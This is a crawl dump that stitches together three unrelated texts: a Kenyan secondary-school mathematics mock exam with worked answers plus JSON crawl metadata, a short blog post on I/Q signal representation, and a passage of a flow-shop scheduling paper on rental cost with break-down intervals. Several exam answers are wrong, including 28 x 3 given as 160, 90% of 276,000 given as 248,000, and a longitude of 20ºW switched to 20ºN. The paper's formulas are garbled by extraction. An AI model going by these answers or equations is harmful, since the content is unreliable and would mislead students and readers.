below:\n Time(min) 0 1 2 3 4 5 Temperature (ºC) 4 5.2 8.4 14.3 16.8 17.5\n1. On the grid provided below, draw the time – temperature graph. (2mks)", null, "2. Use the graph to find the average rate of change in temperature between t=1.8 and t=3.4. (2mks)\n15.6 - 7.6 =   8\n3.4  - 1.8      1.6\n= 5ºc/min\n12. The shortest distance between two points A(40ºN,20ºW) and B(ѲºS,20ºW) on the surface of the earth is 8008km. given that the radius of the earth is 6370km, determine the position of B. (Take π=22/7). (3mks)\nlet ∝ = 40 + Ѳ\n(40 + Ѳ) x 2π x 6370 = 8008\n360\n∴ Ѳ = 32.01º\n∴ position B (32.01ºS, 20ºN)\n13. Simplify           √3         (2mks)\n√3 - √2", null, "14. The table below shows income tax rates in a certain year.\n Monthly income in Kshs. Tax rate in each shilling Up to 9680 10% From 9681 to 18800 15% From 18801 to 27920 20% From 27921 to 37040 25% Over 37040 30%\nIn that year, a monthly personal tax relief of ksh. 1056 was allowed. Calculate the monthly income tax paid by an employee who earned a monthly salary of kshs. 32,500. (4mks)\nfirst 9680 x 10/100 = 968\nsecond 9120 x 15/100 = 1368\nthird 9120 x 20/100 = 1824\nlast 4580 x 25/100 = 1145\ngross tax = 5305\nincome tax = 5305 - 1056\n= sh. 4249\n15. Three types of beverages are mixed in the ration 1:3:5 respectively. Type A costs sh 26, type B costs sh 28 and type C sh 32, per packet. Find the cost of the mixture per packet. (3mks)\n1 + 3 + 5 = 9\ntype A -> 26 x 1 = sh.26\nType B -> 28 x 3 = Sh.160\nTotal cost = sh 270\n∴ cost per packet = sh 270/9 = sh 30\n16. The gradient of a curve is given by dy/dx = x2- 4x+3. The curve passes through the point (1,0). Find the equation of the curve. (3mks)", null, "SECTION II (50MKS)\n\n1. The hire purchase (H.P) price of an electronic device was ksh. 276,000. A deposit of ksh 60,000 was paid followed by 18 equal monthly installments.\n1. Calculate the monthly installment. (2mks)\n276000 - 60000\n= 216 000\n216000\n18\n= sh 12 000\n2. The cash price of the electronic device was 10% less than the hire purchase (H.P) price. Calculate the cash price. (2mks)\n90 x 276 000\n100\n= sh 248 000\n3. Madam Kanini decided to buy the electronic device in cash. She was allowed a 5% discount on the cash price, she took a bank loan to buy the device. The bank charged compound interest on the loan at the rate of 20% p.a. the loan was repaid in 2 years.\n1. Calculate the amount repaid to the bank by the end of the second year. (3mks)\n95/100 x 248 000\n= sh 235 980\nLet principal = sh 235 980\nRate = 20%\nn = 2 yrs\nA = P(1 + r/100)n\n= 235 980 (1 + 20/100)R\n= sh 339, 811. 20\n2. Express as a percentage of the hire purchase (HP) price, the difference between the amount repaid to the bank and the hire purchase price. (3mks)\n339,811.20 - 276,000\n=sh 63, 811.20\n63811.20 x 100\n276000\n= 23.12%\n2. An examination involves a written test and a practical test. The probability that a candidate passes the written test is 6/11. If the candidate passes the written test, then the probability of passing the practical test is 3/5, otherwise it would be 2/7.\n1. Illustrate this information on a tree diagram. (2mks)", null, "2. Determine the probability that a candidate is awarded:\n1. For passing both tests. (2mks)\np(wp)\n= 6/11 x 3/5\n= 18/55\n2. For passing the written test. (2mks)\np(wp) or p(wp')\n6/11 x 3/5 + 6/11 x 2/5\n= 6/11\n3. Determine the probability that the candidate;\n1. Passes one test. (2mks)\np(wp') or p(w'p)\n6/11 x 2/5 + 5/11 x 2/7\n= 1474/4235\n2. Fails for not passing the written test. (2mks)\np(w'p')\n5/11 x 5/7\n= 25/77\n3. Construct triangle PQR with PQ= 7.2cm, QR=6cm and <PQR=48º. (3mks)\n1. The locus L1, of points equidistant from P and Q and Locus L2 of points equidistant from P and R, meet at M. Locate M hence measure QM. (4mks)", null, "2.  A point X moves within triangle PQR such that QX ≥QM. Shade and label the locus of X. (3mks)\n4. Triangle PQR shown on the grid below has vertices P(5,5), Q(10,10) and R(10,15)", null, "", null, "1. Find the coordinates of the points P΄Q΄ and R΄ the images of P,Q and R respectively under transformation M whose matrix is [- 0.6  0.8] (3mks)\n[ 0.8    0.6]\nGiven that M is a reflection:\n1. Draw triangle P΄Q΄R΄ and the mirror line of the reflection. (2mks)\nline y = 2x drwan/identified\n2. Determine the equation of the mirror line of the reflection. (2mks)\ngradient of m = 2 units\nlet y = mx + c\ny = 2x + 0\n∴ y = 2x\n2. Triangle P˝Q˝R˝ is the image of triangle P΄Q΄R΄ under reflection N, where N is a reflection in the Y-axis.\n1. Determine triangle P˝Q˝R˝ (1mk)\nin the graph\n2. Determine a 2x2 matrix equivalent to the transformation NM. (2mks)", null, "5. In the figure below, PR is the diameter of the circle with centre O. Points P, Q, R and S are on the circumference of the circle. Angle PRQ = 72⁰ , QS = QP and line USV is a tangent to the circle at S.\nGiving reasons, calculate the size of:", null, "1. ∠QPR (2 marks)\n2. ∠PQS (2 marks)\n3. ∠OQS (2 marks)\n4. ∠RTS (2 marks)\n5. ∠RSV (2 marks)\n6. Three quantities R,S and T are such that R varies directly as S and inversely as the square of T.\n1. Given that R= 480 when S=150 and T=5, write an equation connecting R, S and T. (4mks)\nans = R = 80S\nT2\n\n2.\n1. Find the value of R when S=360 and T=1.5. (2mks)\nR = 80 x 360\n152\n= 12, 800\n2. Find the percentage change in R if s increase by 5% and T decreases by 20%. (4mks)\nAns = 64.06% increase\n7. For a C B C inservice training course for teachers, at least four (4) but not more that nine(9) teachers are to be chosen per school. The ratio of the number of male teachers to the number of female teachers must be less than 2:1 and there must be more males than females. If x and y represent the number of male teachers and female teachers respectively:\n1. Write down in their simplest form the inequalities that x and y must satisfy. (4mks)\n1. x + y ≥ 4 (at least 4 teachers)\n2. x + y ≤ 9 (not more than 9 teachers)\n3. x:y < 2:1\nx < 2y\n4. x>y (more males than females)\n2. On the gird provided below, represent the inequalities on the graph. (4mks)", null, "3. Use the graph to determine the composition of the training group of:\n1. The largest size. (1mk)\nintegral values (5,4)\n5 + 4 = 9 teachers\n2. The smallest size. (1mk)\nintegral values (3,2)\n3 + 2 = 5 teachers\n8. The equation of a curve is given by y=5x- ½ x2.", null, "1. On the grid provided below, draw the curve of y=5x- ½ x2 for 0≤x≤6. (3mks)\n x 0 1 2 3 4 5 6 y 0 4.5 8 10.5 12 12.5 12\n2. By integration, find the area bounded by the curve, the line x=6 and the x-axis. (3mks)", null, "3. On the same grid, draw the line y=2x. (1mk)\nLine drawn (must be straight)\n4. Determine the area bounded by the curve and the line y=2x. (3mks)\nA = 54 - Area of triangle\n= 54 - 1/2 x 6 x 12\n= 54 - 36\n= 18 sq.units\n\n• ✔ To read offline at any time.\n• ✔ To Print at your convenience\n• ✔ Share Easily with Friends / Students" ]
[ null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNTAiIGhlaWdodD0iMTI5Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1NCIgaGVpZ2h0PSI1NiI+PC9zdmc+", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1NCIgaGVpZ2h0PSI1NiI+PC9zdmc+", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzNjQiIGhlaWdodD0iMTg5Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI0NyIgaGVpZ2h0PSIzOCI+PC9zdmc+", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1MzQiIGhlaWdodD0iNTQ0Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNDUiIGhlaWdodD0iMTk5Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxODYiIGhlaWdodD0iMTMzIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNTAiIGhlaWdodD0iMTI5Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxNTgiIGhlaWdodD0iMTMxIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1NCIgaGVpZ2h0PSI1NiI+PC9zdmc+", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1NCIgaGVpZ2h0PSI1NiI+PC9zdmc+", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyMDQiIGhlaWdodD0iMTA4Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMzUiIGhlaWdodD0iMTExIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxODkiIGhlaWdodD0iMTYwIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzNjQiIGhlaWdodD0iMTg5Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzOTkiIGhlaWdodD0iMTAyIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI0NyIgaGVpZ2h0PSIzOCI+PC9zdmc+", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI2MTAiIGhlaWdodD0iMzM2Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyODkiIGhlaWdodD0iMTIwIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNjEiIGhlaWdodD0iMjE0Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyMDciIGhlaWdodD0iMTE4Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI0ODIiIGhlaWdodD0iNDYzIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1NzMiIGhlaWdodD0iNjAyIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzOTgiIGhlaWdodD0iMTQ3Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNjYiIGhlaWdodD0iMTgyIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNDUiIGhlaWdodD0iMTk5Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1OTAiIGhlaWdodD0iMzA1Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1NTYiIGhlaWdodD0iMjkyIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNDAiIGhlaWdodD0iMTYwIj48L3N2Zz4=", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8802682,"math_prob":0.998833,"size":17531,"snap":"2022-40-2023-06","text_gpt3_token_len":6087,"char_repetition_ratio":0.14805728,"word_repetition_ratio":0.6954201,"special_character_ratio":0.36729223,"punctuation_ratio":0.11958449,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9989191,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-28T23:03:26Z\",\"WARC-Record-ID\":\"<urn:uuid:4b3adcbf-d797-4689-aed9-a82f874849be>\",\"Content-Length\":\"174223\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9cf9cbf4-5d5d-4997-8cd7-45a3ab036308>\",\"WARC-Concurrent-To\":\"<urn:uuid:e447b801-c715-4181-9efd-cad33e985a09>\",\"WARC-IP-Address\":\"75.119.156.104\",\"WARC-Target-URI\":\"https://www.easyelimu.com/kenya-secondary-schools-pastpapers/mocks/2022/item/6126-mathematics-paper-2-questions-and-answers-lanjet-joint-mock-exams-2022\",\"WARC-Payload-Digest\":\"sha1:YLJQBKPEHATJAX7UI2RSRUKNBYEVZV3L\",\"WARC-Block-Digest\":\"sha1:2U4JWCHKB6ZPMRFSKIZEKEMJISJQKM43\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499695.59_warc_CC-MAIN-20230128220716-20230129010716-00165.warc.gz\"}"}
https://blog.shuningbian.net/2015/10/on-use-of-iq-signals.html
[ "## 2015-10-05\n\n### On the Use of I/Q Signals\n\n• All signals are complex, that is they have the form of $$x(t)=A\\exp(i\\omega t)$$. I/Q presentation of a signal fully captures this by storing the real component in the I, the in-phase signal, and the complex component in Q, the quadrature signal.\n• When we force signals to be purely real, e.g. $\\cos(\\omega t)$, we taking the real part of $exp(i\\omega t)$. Because we ignore the imaginary component, we lose information. Specifically, $\\cos(\\omega t)$ can be the real part of $\\exp(i\\omega t)$ or $\\exp(-i\\omega t)$. We don't know any more.\n• This ambiguity is present in the exponential form of $\\cos$: $$\\cos(\\omega t) = \\frac{\\exp(i \\omega t) + \\exp(-i\\omega t)}{2}$$. Note the presence of the two complex signals whose sum is always purely real as their imaginary parts cancel out. The real part of either complex signal will produce $\\cos(\\omega t)$.\n• This ambiguity is why when you multiply $\\cos(\\omega_0 t)$ and $\\cos(\\omega_1 t)$ you end up with $\\cos[(\\omega_0 + \\omega_1)t]$ and $\\cos[(\\omega_0 - \\omega_1)t]$. In other words, the frequency add as $\\pm \\omega_0 \\pm \\omega_1$, which produces 4 unique combinations that reduces to 2 because $\\cos$ is even.\n• The result of multiplying real cosines produces two peaks in the frequency spectrum.\n• On the other hand, preserving the complex nature of a signal by presenting it as $A\\exp(i\\omega t)$ means that multiplying two signals together produces a unique result: $$A_0\\exp(i\\omega_0 t) \\times A_1\\exp(i\\omega_1 t) = A_0A_1\\exp[i(\\omega_0 + \\omega_1)t]$$. This is because there is no ambiguity as we have not thrown away any information.\n• The result of multiplying complex signals produces one peak in the frequency spectrum.\n• This is one of the advantages of working with I/Q data, which preserves the complex nature of signals, and allows us to frequency shift a signal through multiplication without also generating an additional unwanted image of the signal.\nCheers,\nSteve" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.81999975,"math_prob":0.9992424,"size":1944,"snap":"2022-40-2023-06","text_gpt3_token_len":501,"char_repetition_ratio":0.16443299,"word_repetition_ratio":0.013071896,"special_character_ratio":0.27417696,"punctuation_ratio":0.09115282,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9991923,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-03T11:22:31Z\",\"WARC-Record-ID\":\"<urn:uuid:4075b2d6-ef63-4519-80c9-3e948eba8516>\",\"Content-Length\":\"88297\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9c3e9a70-7fd8-4b1e-a255-25d63aeafa3c>\",\"WARC-Concurrent-To\":\"<urn:uuid:a330e864-1511-4330-9dd0-863f18073ae4>\",\"WARC-IP-Address\":\"172.253.115.121\",\"WARC-Target-URI\":\"https://blog.shuningbian.net/2015/10/on-use-of-iq-signals.html\",\"WARC-Payload-Digest\":\"sha1:CASKWR376HFZMZNI5JG6EVP7P7JOBOKF\",\"WARC-Block-Digest\":\"sha1:4T3JYJBDPHRLLUW5EU4MYQMKSAHJYFNQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337415.12_warc_CC-MAIN-20221003101805-20221003131805-00314.warc.gz\"}"}
https://1library.net/document/qo12dpjz-minimizing-specified-processing-associated-probabilities-including-interval-criteria.html
[ "# Minimizing Rental Cost under Specified Rental Policy in Two Stage Flow Shop, the Processing Time Associated with Probabilities Including Break-down Interval and Job – Block Criteria\n\n20\n\n## Full text\n\n(1)\n\n### Job – Block Criteria\n\nSameer Sharma (Corresponding author) Assistant Professor, Dept. of Mathematics,\n\nD.A.V. College, Jalandhar, Punjab, India\n\nTel: 011+91-9814819064, Email: [email protected]\n\nDeepak Gupta,\n\nProf. & Head, Dept. of Mathematics,\n\nMaharishi Markandeshwar University, Mullana, Ambala ,India Tel: 011+91-9896068604, Email: [email protected]\n\nAbstract\n\nIn real world scheduling applications, machines might not be available during certain time periods due to deterministic or stochastic causes. This paper is an attempt to study the two machine general flow shop problem in which the processing time of the jobs are associated with probabilities, following some restrictive renting policy including break-down interval and equivalent job-block criteria. The objective of the paper is to find an algorithm to minimize the rental cost of the machines under specified rental policy with break-down interval and job block criteria. The proposed method is very simple and easy to understand and also, provide an important tool for decision makers. The method is justified with the help of numerical example and a computer program.\n\nKeywords: Equivalent-job, Rental Policy, Makespan, Elapsed time, Idle time, Break-down interval, Johnson’s technique, Optimal sequence.\n\n1. Introduction\n\nThe classical scheduling literature commonly assumes that the machines are never unavailable during the process. This assumption might be justified in some cases but it does not apply if certain maintenance requirements, break-downs or other constraints that causes the machine not to be available for processing have to be considered. The temporal lack of machine availability is known as ‘break-down’.Before 1954, the concept of break-down of machines had not considered by any author. In 1954 Johnson had considered the effect of break-down of machines on the completion times of jobs in an optimal sequence. Later on many researchers such as Adiri , Akturk and Gorgulu , Smith , Szwarc, Chandramouli , Singh T.P. , Belwal and Mittal etc. have discussed the various concepts of break-down of machines. The functioning of machines for processing the jobs on them is assumed to be smooth with having no disturbance on the completion times of jobs. But there are feasible sequencing situations in flow shops where machines while processing the jobs get sudden break-down due to failure of a component of machines for a certain interval of time or the machines are supposed to stop their working for a certain interval of time due to some external imposed policy such as stop of flow of electric current to the machines may be a government policy due to shortage of electricity production. In\n\n(2)\n\neach case this may be well observed that working of machines is not continuous and is subject to break for a certain interval of time.\n\nIn flow-shop scheduling, the object is to obtain a sequence of jobs which when processed in a fixed order of machines, will optimize some well defined criteria. Various Researchers have done a lot of work in this direction. Johnson , Ignall and Scharge , Szwarch . Chandra Shekhran , Maggu & Das , Bagga P.C. , Singh T.P., Gupta Deepak etc. derived the optimal algorithm for two, three or multi stage flow shop problems taking into account the various constraints and criteria. Maggu & Das introduced the concept of equivalent-job blocking in the theory of scheduling. The concept is useful and significant in the sense to create a balance between the cost of providing priority in service to the customer and cost of giving services with non priority customers. The decision maker may decide how much to charge extra from the priority customer. Further, Maggu , Singh T.P and Gupta Deepak associated probabilities with processing time and set up time in their studies. Later, Singh T.P., Gupta Deepak studied n x 2 general flow shop problem to minimize rental cost under a pre-defined rental policy in which the probabilities have been associated with processing time on each machine including job block criteria. We have extended the study made by Singh T.P., Gupta Deepak by introducing the concept of break-down interval. We have developed an algorithm minimizing the utilization time of second machine combined with Johnson’s algorithm in order to minimize the rental cost of machines.\n\n2. Practical Situation\n\nVarious practical situations occur in real life when one has got the assignments but does not have one’s own machine or does not have enough money or does not want to take risk of investing huge amount of money to purchase machine. Under such circumstances, the machine has to be taken on rent in order to complete the assignments. In his starting career, we find a medical practitioner does not buy expensive machines say X-ray machine, the UltraSound Machine, Rotating Triple Head Single Positron Emission Computed Tomography Scanner, Patient Monitoring Equipment, and Laboratory Equipment etc., but instead takes on rent. Rental of medical equipment is an affordable and quick solution for hospitals, nursing homes, physicians, which are presently constrained by the availability of limited funds due to the recent global economic recession. Renting enables saving working capital, gives option for having the equipment, and allows upgradation to new technology.\n\nSometimes the priority of one job over the other is preferred. It may be because of urgency or demand of its relative importance, the job block criteria becomes important.\n\nAnother event which is mostly considered in the models is the break-down of machines. There may also be delays due to material, changes in release and taildates, tools unavailability, failure of electric current, the shift pattern of the facility and fluctuations in processing times. All of these events complicate the scheduling problem in most cases. Hence the criterion of break-down interval becomes significant.\n\n3. Notations\n\nS : Sequence of jobs 1,2,3,….,n Mj : Machine j, j= 1,2,…….\n\nAi : Processing time of ith job on machine A. Bi : Processing time of ith job on machine B.\n\n### A\n\ni' : Expected processing time of ith job on machine A.\n\n'\n\ni\n\n### B\n\n: Expected processing time of ith job on machine B.\n\npi : Probability associated to the processing time Aiof ithjob on machine A. qi : Probability associated to the processing time Bi of ith job on machine B.\n\n(3)\n\nβ : Equivalent job for job – block. L : Length of the break-down interval.\n\n### A\n\ni'' : Expected processing time of ith job after break-down effect on machine A .\n\n### B\n\ni'' : Expected processing time of ithjob after break-down effect on machine B. Si : Sequence obtained from Johnson’s procedure to minimize rental cost.\n\nCj : Rental cost per unit time of machine j.\n\nUi : Utilization time of B (2 nd machine) for each sequence Si t1(Si) : Completion time of last job of sequence Sion machine A.\n\nt2(Si) : Completion time of last job of sequence Si on machine B. R(Si) : Total rental cost for sequence Si of all machines.\n\nCT(Si) :Completion time of 1stjob of each sequence Sion machine A. 4. Assumptions\n\n1. We assume the rental policy that all the machines are taken on rent as and when they are required and are returned as when they are no longer required for processing. Under this policy second machine is taken on rent at time when first job completes its processing on first machine. Therefore idle time of second machine for first job is zero.\n\n2. Jobs are independent to each other.\n\n3. Machine break-down interval is deterministic, .i.e. the break-down intervals are well known in advance. This simplifies the problem by ignoring the stochastic cases where the break-down interval is random. 4. Pre- emption is not allowed, .i.e. once a job started on a machine, the process on that machine can’t be stopped unless the job is completed.\n\n7. Definitions 7.1 Definition 1:\n\nAn operation is defined as a specific job on a particular machine. 7.2 Definition 2:\n\nSum of idle time of M2 (for all jobs)\n\n1 1 2 2 3 2 2 1 ' ' ' ' ' ' ' ' ' 2 1 1 1 1 1 1 1 1 1\n\n### ,\n\nn n n n n n n i i i i i i i i i i i i i i i i i i i\n\n### A\n\n              \n\n## \n\n1 2 2 1\n\nn\n\nn\n\nn\n\nk i k n\n\n \n\n### \n\n, where 1 ' ' 1 1 k k k i i i i\n\n  \n\n## \n\n### \n\n1 ' ' 1 1 k k k i i i i\n\n  \n\n## \n\n### \n\n7.3 Definition 3:\n\nTotal elapsed time for a given sequence.\n\n= Sum of expected processing time on 2 nd machine (M2) + Total idle time on M2\n\n=\n\n## \n\n### \n\n   n i i n i i n i i\n\n1 ' 1 2 1 '\n\nk , where PK =\n\n## \n\n  \n\n### \n\n1 1 ' 1 ' k i i k i i\n\n### A\n\n. 8. Theorem’s Theorem 8.1:\n\n(4)\n\nEquivalent job block theorem due to Maggu & Das . In two machine flow shop in processing a schedule S=(α1, α2,… αk-1, αk, αk+1… αn) of n jobs on two machines A & B in the order AB with no passing\n\nallowed the job block (αk, αm) having processing times A αk,B αk,A αm,B αm is equivalent to the single job\n\nβ(called equivalent job β). The processing times of equivalent job β on the machines A & B denoted respectively by Aβ and Bβ are given by\n\nA β = A αk+A αm – min(B αk,A αm)\n\nBβ = B αk+B αm – min(B αk,A αm)\n\nTheorem 8.2:\n\nJob i precedes to job j in optimal ordering, having minimum idle time on B if\n\ni\n\nj\n\nj\n\ni\n\nwhere\n\ni\n\n### \n\n= Expected processing time of i th job on A = Ai × pi\n\n### \n\nj= Expected processing time of i thjob on B = Bi × qi\n\nProof:\n\nLet two sequences S1 and S2 of n jobs differ with job j and j+1 (j≠1) interchange in their positions. S1 = 1 ,2, 3 ,4,…,j+1 ,j, j+1 ,j+2 .……,n.\n\nS2 = 1, 2, 3, 4…..,j-1, j+1 ,j, j+2, …., n.\n\nBy definition,\n\nk\n\nk\n\n### \n\nfor sequences S1 & S2 respectively will be same for k = 2,3,…,j-1,j+2,…n.\n\ni.e.\n\nk\n\n=\n\nk\n\n### \n\nfor k = 2,3,…,j-1,j, j+2,…n. Now only\n\nj\n\nj1\n\nj\n\n### ,\n\nj1 are left to be determined\n\n1 1 1 j j j i i i i\n\n  \n\n## \n\n### \n\n…..(1) 1 1 1 1 j j j i i j i i\n\n   \n\n##  \n\n### \n\n…..(2) 1 1 1 1 1 j j j i i i i\n\n    \n\n##  \n\n### \n\n…..(3) 1 1 1 1 1 1 j j j i i j i i\n\n     \n\n## \n\n### \n\n……(4) On subtracting (1) from (3), we get\n\n1 1\n\nj j j j\n\n### \n\n……(5)\n\nOn subtracting (1) from (2), we get\n\nj\n\nj\n\nj\n\nj1\n\nj\n\nj\n\nj\n\n### \n\nj1 …..(6) On subtracting (3) from (4), we get\n\n1 1 1 1 1 1 j j j j j j j j\n\n     \n\n### \n\n…..(7) Sequence S1, will give min. idle time in comparison to S2 if\n\n(5)\n\nj\n\nj1\n\nj\n\nj1\n\nj\n\nj1\n\nj\n\nj\n\nj1\n\nj\n\n1\n\nj\n\nj1\n\n### )\n\n(using (6) &(7) )\n\nOn subtracting\n\nj\n\nj1\n\n### )\n\nfrom both sides, we get\n\nj\n\nj\n\nj1\n\nj\n\n1\n\nj\n\nj1\n\nj\n\nj1\n\nj\n\nj1\n\nj\n\nj1\n\nj1\n\nj\n\n1\n\nj\n\nj1\n\nj\n\nj1\n\nj\n\nj1\n\nj\n\nj1\n\nj1\n\nj1\n\nj\n\nj1\n\nj\n\nj1\n\nj\n\nj1\n\nj\n\nj1\n\n(using (5) )\n\nj1\n\nj\n\nj\n\nj1\n\nj1\n\nj\n\nj\n\nj1\n\nj1\n\nj\n\nj\n\nj1\n\nj\n\nj1\n\nj1\n\nj\n\n….. (8)\n\nAlso\n\nj\n\nj1\n\nj1\n\nj\n\n### )\n\n….. (9)\n\n(if S1 & S2 are in-different)\n\nFrom (8) & (9), we conclude that sequence S1 will be preferable to S2 if\n\n1\n\nj\n\nj\n\nj1\n\nj\n\n### )\n\nIf these conditions hold then job j precedes over j+1 for optimal order having minimum idle time. 9. Algorithm\n\nBased on the equivalent job block theorem by Maggu & Das and by considering the effect of break-down interval (a ,b) on different jobs, the algorithm which minimize the total rental cost of machines under specified rental policy with the minimum makespan can be depicted as below:\n\nStep 1: Define expected processing time\n\ni' &\n\n### B\n\ni' on machine A & B respectively as follows:\n\n' i\n\n= Ai × pi ' i\n\n### B\n\n= Bi× qi\n\nStep 2: Define expected processing time of job block β = (k ,m) on machine A & B using equivalent job block given by Maggu & Das i.e. find\n\n' and\n\n' as follows:\n\n' \n\n=\n\nk'+\n\nm' – min (\n\nk' , ' m\n\n) ' \n\n=\n\nk'+\n\nm' – min (\n\nk' , ' m\n\n### A\n\n)\n\nStep 3: Using Johnson’s two machine algorithm obtain the sequence S, while minimize the total elapsed time.\n\nStep 4: Prepare a flow time table for the sequence obtained in step 3 and read the effect of break-down interval (a ,b) on different jobs on the lines of Singh T.P. .\n\nStep 5: Form a reduced problem with processing times\n\ni'' and\n\n### B\n\ni''. If the break-down interval (a, b) has effect on job i then\n\nAi ’’ =Ai +L Bi ’’ =Bi\n\n+L ; Where L = b – a, the length of break-down interval If the break-down interval (a, b) has no effect on ith job then\n\nAi ’’ =Ai Bi ’’ =Bi\n\nStep 6: Find the processing times\n\n'' and\n\n'' of job-block\n\n### )\n\non machine A and B using equivalent job-block β as in step 2.\n\n(6)\n\nStep 7: Now repeat the procedure to get the sequence Si, using Johnson’s two machine algorithms as in step 3.\n\nStep 8: Observe the processing time of 1st job of S1 on the first machine A. Let it be α.\n\nStep 9: Obtain all the jobs having processing time on A greater than α. Put these job one by one in the 1st position of the sequence S1 in the same order. Let these sequences be S2, S3, S4 